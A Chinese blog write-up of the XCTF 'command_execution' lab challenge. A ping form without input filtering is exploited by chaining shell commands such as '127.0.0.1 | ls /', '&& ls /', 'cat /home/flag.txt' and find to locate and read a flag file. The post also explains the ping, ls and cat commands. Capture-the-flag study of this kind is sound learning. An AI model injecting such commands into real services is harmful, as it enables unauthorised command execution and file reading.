[CTF/网络安全] 攻防世界 command_execution 解题详析

这篇具有很好参考价值的文章主要介绍了[CTF/网络安全] 攻防世界 command_execution 解题详析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全

ping命令

ping 命令是一个常用的网络命令,用于测试两台计算机之间网络连接的连通性。通过向目标计算机发送 ICMP 协议的数据包,并等待目标计算机返回响应数据包来测试网络的可达性,同时也可以测试网络的延迟和丢包率等信息。

在终端中使用 ping 命令的基本语法为:

ping <IP地址或主机名>

例如,要测试目标计算机的 IP 地址为 192.168.1.1 的网络连通性,可以运行以下命令:

ping 192.168.1.1

ping 命令将会输出一些关于网络连接的信息,包括每个数据包的传输时间、接收时间和延迟时间等。如果目标计算机能够正确响应 icmp 数据包,那么 ping 命令将会显示类似以下的信息:

这表示目标计算机成功返回了一个数据包,并花费了 4.56 毫秒的时间。如果无法连接到目标计算机,则 ping 命令将会显示类似以下的信息:

ping: connect: Network is unreachable

这表示无法连接到目标计算机。可以根据 ping 命令输出的信息排查网络故障,以便进行调试和修复网络连接问题。

ping命令的应用格式

  1. ping+IP地址或主机域名
  2. ping+IP地址或主机域名+命令参数
  3. ping+命令参数+IP地址或主机域名
    注意,+要换成空格

ping命令执行漏洞

如果 ping 命令不正确地处理其输入参数,就可能存在被攻击者利用来运行危险的命令的风险。
例如,如果在 ping 命令中使用了一个长度超过其预期的输入参数,则可能会导致该命令出现缓冲区溢出漏洞。

攻击者可以通过构造恶意输入参数来利用这种漏洞,并在受害者的计算机上执行任意代码,包括下载和安装恶意软件、破坏文件或系统配置、窃取敏感信息等。

该题可将输入参数截断从而让其运行危险的参数,常见的连接符有:
command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全
例如,ping127.0.0.1| ls /时,将显示ls /的执行结果,即列出目录

ls命令

ls 命令是一个常见的用于列出指定目录中的文件和子目录的命令,它通常用于 Unix、Linux 和 macOS 等操作系统中。该命令通常使用以下语法:

ls [OPTIONS] [FILE(S)]

其中 OPTIONS 是可选的命令参数,可以用于修改 ls 命令的行为。FILE(S) 是要列出的文件或目录的名称,也可以是通配符表达式,用于匹配符合特定模式的所有文件和目录。

以下是 ls 命令的一些常见选项:

  • -a:列出所有文件,包括隐藏文件。
  • -l:使用长格式显示文件详细信息,包括文件权限、所有者、大小、修改日期等。
  • -h:以人类可读的格式显示文件大小。
  • -t:按修改时间顺序列出文件和目录,最近修改的排在最前面。
  • -r:按相反顺序(即最早的先列出)列出文件和目录。

例如,要列出当前目录下的所有文件和目录,可以执行以下命令:

ls

要列出特定目录下的所有文件和目录,例如 /etc 目录,则可以执行以下命令:

ls /etc

您还可以使用不同的选项来修改 ls 命令的行为,例如:

ls -l /etc

该命令将以长格式列出 /etc 目录下的所有文件和子目录,并包括详细信息如权限、所有者、大小、修改日期等。


cat命令

cat 是一个常用的在 Linux 操作系统上查看文件内容的命令。cat 命令通常使用以下语法:

cat [OPTIONS] [FILE(S)]

其中,OPTIONS 是可选的命令参数,可以用于修改 cat 命令的行为。FILE(S) 是要查看内容的文件列表。

以下是一些常见的 cat 命令选项:

  • -n:显示每行行号。
  • -b:显示行号,但对于空白行不进行编号。
  • -E:在每行末尾显示 $ 符号。
  • -T:将制表符字符 (\t) 显示为 ^I
  • -s:删除重复的空行,并将连续多个空行压缩成一个空行。

例如,要查看文件 /etc/fstab 中的内容,可以执行以下命令:

cat /etc/fstab

如果您想在行号前添加行号,可以使用 -n 选项:

cat -n /etc/fstab

该命令将显示 /etc/fstab 文件的内容,并在每行行首添加行号。


姿势

ping本地回环地址

Payload:127.0.0.1

command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全
本地回环地址是网络通信中的特殊地址,指向本机的网络接口,因此通过发送 icmp 数据包到该地址来测试网络连通性和延迟。

在这个命令中,参数 -c 3 表示 ping 命令将会发送三个 icmp 数据包到目标主机。结果显示,三个数据包都成功发送和接收,并且没有任何数据包丢失。最后一行输出了关于这三个数据包的一些统计信息,包括平均延迟时间等。

这个结果说明本机的网络回环接口工作正常,同时也可以用来测试 ping 命令是否正常工作。

需要注意的是,这个测试结果并不能完全代表主机与其他计算机之间的网络连接状态,因为本地回环地址并不经过网络硬件设备,因此不会受到网络拥塞和其他网络故障的影响。

由于接口工作正常,因此可进行命令执行


ping目录

Payload127.0.0.1| ls /
127.0.0.1 && ls /
command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全

ping文件夹

Payload127.0.0.1 |ls /目录名

command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全

home目录下找到flag文件:

command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全

ping文件

Payload127.0.0.1 | cat /home/flag.txt

command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全

Tips

在已知某文件名的基础上,可使用find命令:127.0.0.1 | find / -name "文件名"
如图:

command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全

在已知部分某文件名的基础上 ,可使用find命令:127.0.0.1 && find / -name "已知文件名的部分*"
如图:

command_execution,# CTF赛题,网络安全,web安全,CTF,网络安全


总结

该题考察ping命令执行漏洞及Linux部分操作系统命令。
我是秋说,我们下次见。文章来源地址https://www.toymoban.com/news/detail-734928.html

到了这里,关于[CTF/网络安全] 攻防世界 command_execution 解题详析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [CTF/网络安全] 攻防世界 wife_wife 解题详析

    该题涉及Java Script原型链污染:JavaScript 原型链污染讲解 可以看到,后端编程语言为Node.js, 简单来讲,通过 newUser.__proto__ 可以访问到新对象的原型 未污染时: 污染时: 我们以知识点的利用为主,查看源代码: 若isAdmin的属性是true,则它为管理员,否则为普通用户;于是我

    2024年02月06日
    浏览(35)
  • [CTF/网络安全] 攻防世界 php_rce 解题详析

    PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),攻击者通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器

    2024年02月06日
    浏览(40)
  • [CTF/网络安全] 攻防世界 view_source 解题详析

    题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 单击鼠标右键,点击查看页面源代码: 使用浏览器菜单:不同的浏览器可能会在不同的位置提供查看页面源代码的选项。 以Firefox为例,打开应用程序菜单即可: 使用快捷键:几乎

    2024年02月13日
    浏览(37)
  • [CTF/网络安全] 攻防世界 simple_php 解题详析

    题目描述:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 $a=@$_GET[\\\'a\\\']; 从HTTP GET请求参数中获取一个名为a的变量,并将其赋值给变量a。@符号用于禁止错误输出,如果不存在参数a则会将变量a设置为NULL。 $b=@$_GET[\\\'b\\\']; 从HTTP GET请求参数中获取一个名为b的变量,

    2024年02月13日
    浏览(32)
  • [CTF/网络安全] 攻防世界 weak_auth 解题详析

    题目描述:小宁写了一个登陆验证页面,随手就设了一个密码。 weak_auth翻译: 弱认证 这个术语通常用来描述一种较弱的安全认证方法或机制,它可能存在安全漏洞,易受到攻击或者被绕过。 在信息安全领域中,弱认证是一种常见的安全威胁。例如,使用简单的密码或者未加

    2024年02月13日
    浏览(31)
  • [CTF/网络安全] 攻防世界 fileinclude 解题详析(php伪协议)

    由于index.php在/var/www/html目录下,而flag.php与index.php同为php文件,故猜想flag.php也在该目录下。 查看页面源代码获取更多信息: 源代码中看到 @include($lan.\\\".php\\\"); ,即此处存在文件包含。 又因为 $lan = $_COOKIE[\\\'language\\\']; 因此解题思路为:利用php伪协议,构造language参数,来读取该目

    2024年02月07日
    浏览(33)
  • [CTF/网络安全] 攻防世界 disabled_button 解题详析

    题目描述:X老师今天上课讲了前端知识,然后给了大家一个不能按的按钮,小宁惊奇地发现这个按钮按不下去,到底怎么才能按下去呢? 题目提示 前端知识 ,由HTML相关知识可知,该按钮 即input标签 不能提交的原因有以下六种: 没有包含在表单中: input 标签必须包含在表

    2024年02月07日
    浏览(36)
  • [CTF/网络安全] 攻防世界 file_include 解题详析(php伪协议+convert转换过滤器)

    题目描述:怎么读取文件呢? 思路: 由代码审计可知,可通过filename参数构造POC,来读取check.php POC的构造涉及PHP伪协议,参考链接: 文件包含 | PHP伪协议实战 POC: 回显如下: 猜测被过滤,怎么办呢? 该题涉及到 convert转换过滤器 常见的convert转换过滤器有这两种:

    2024年02月07日
    浏览(44)
  • [CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

    这段代码首先通过 show_source(__FILE__) 显示当前文件的源代码,然后通过 $_GET[\\\'hello\\\'] 显示 URL 参数中名为 hello 的值。 接下来,代码使用 $_GET[\\\'page\\\'] 获取 URL 参数中名为 “page” 的值,并进行字符串替换,将 php:// 替换为空字符串 这是为了防止通过 URL 参数加载本地文件或其他可

    2024年02月08日
    浏览(34)
  • 有哪些信息安全/网络安全/渗透测试/众测/CTF/红蓝攻防/漏洞测试等前沿技术/研究/技巧获取渠道?

    护网的定义是以国家组织组织事业单位、国企单位、名企单位等开展攻防两方的网络安全演习。进攻方一个月内采取不限方式对防守方展开进攻,不管任何手段只要攻破防守方的网络并且留下标记即成功,直接冲到防守方的办公大楼,然后物理攻破也算成功。护网是国家应对

    2024年02月06日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包